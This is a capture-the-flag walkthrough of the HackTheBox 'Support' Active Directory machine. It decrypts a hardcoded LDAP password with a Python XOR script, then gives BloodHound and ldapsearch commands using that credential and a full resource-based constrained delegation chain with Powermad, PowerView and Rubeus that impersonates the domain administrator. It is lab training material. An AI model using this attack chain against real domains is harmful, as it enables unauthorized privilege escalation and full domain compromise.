SUPPORT – HACKTHEBOX

This is the Writeup/Walkthrough of the SUPPORT Machine from Hackthebox.

nmap scan:

53/tcp  open  domain?       syn-ack
88/tcp  open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-08 06:33:49Z)
135/tcp open  msrpc         syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds? syn-ack
464/tcp open  kpasswd5?     syn-ack
593/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped    syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 19493/tcp): CLEAN (Timeout)
|   Check 2 (port 32384/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45724/udp): CLEAN (Timeout)
|   Check 4 (port 13515/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_smb2-time: Protocol negotiation failed (SMB2)

ON smb, found 3 shares, on suppported-tools directory, downloaded UserInfo.exe.zip, extracted the all files, and used dnSpy to debug the UserInfo.exe file, after debugging found a password for ldap query with key:

to decrypt the password, I used chatgpt to reverse the code

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando"

def decrypt_password():
    decoded_password = base64.b64decode(enc_password)
    decrypted_bytes = bytearray(len(decoded_password))

    for i in range(len(decoded_password)):
        decrypted_bytes[i] = decoded_password[i] ^ ord(key[i % len(key)]) ^ 223

    return decrypted_bytes.decode('utf-8')

decrypted_password = decrypt_password()
print("Decrypted Password:", decrypted_password)

i got the password, of user ldap, after that enumerating for the users and domain using bloodhound using the password, that i find, but didn’t find anything interesting except a user “support” can PsRemote into DC.

./bloodhound.py -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174 --zip -c All

after the process, uploaded the zip file into BloodHound, Support user can PSRemote into DC, that’s mean, if i got the user support i can get the DC without any credentials.

after enumerating many things didn’t found anything for support user foothold, after that i tried searching for OU in support.htb using ldapserach, using ldapsearch, found password of support of user

ldapsearch -H ldap://10.10.11.174  -b "dc=support,dc=htb" -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' > ldap_search

open with mousepad, and search for Common Name, “CN=support,CN=Users” i already found that in in bloodhound, that there is support user, so i search for this specific users, and found the password.

after getting the password of support user, logged into using evil-winrm, ran again SharpHound.exe and uploaded the data to BloodHound, looking for shortest path to Domain Admin found as above user can PSRemote into DC.SUPPORT.HTB, but i don’t have credentials for administrator, looking forward, looking for user support OUTBOUND OBJECT CONTROL > GROUP DELEGATE OBJECT CONTROL, found that Support user is member of Shared Support Account, and this group has Generic All to DC.SUPPORT.HTB

Abusing Generic All, to abuse this, I uploaded Powermad.ps1, PowerView.ps1 and Rubeus.exe on support user Desktop folder.

Adding new machine to domain

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
#assinging computer sid 
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
#building generic ACE with attacker-added computer SID
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#setting Security Descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity field.
Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#getting rc4 hash of plain text password
.\Rubeus.exe hash /password:Summer2018!

copy the rc4 hash, then after used Rubeus.exe s4u module to get a service ticket for the service name

.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

after gettting the ticket, copied and save it into file and base64 decoded it and converted using impacket-ticketConverter to ccache file.

after converting the ticket used the ticket to login as administrator using impacket-psexec, psexec.py can be also used.

Leave a Reply

Your email address will not be published. Required fields are marked *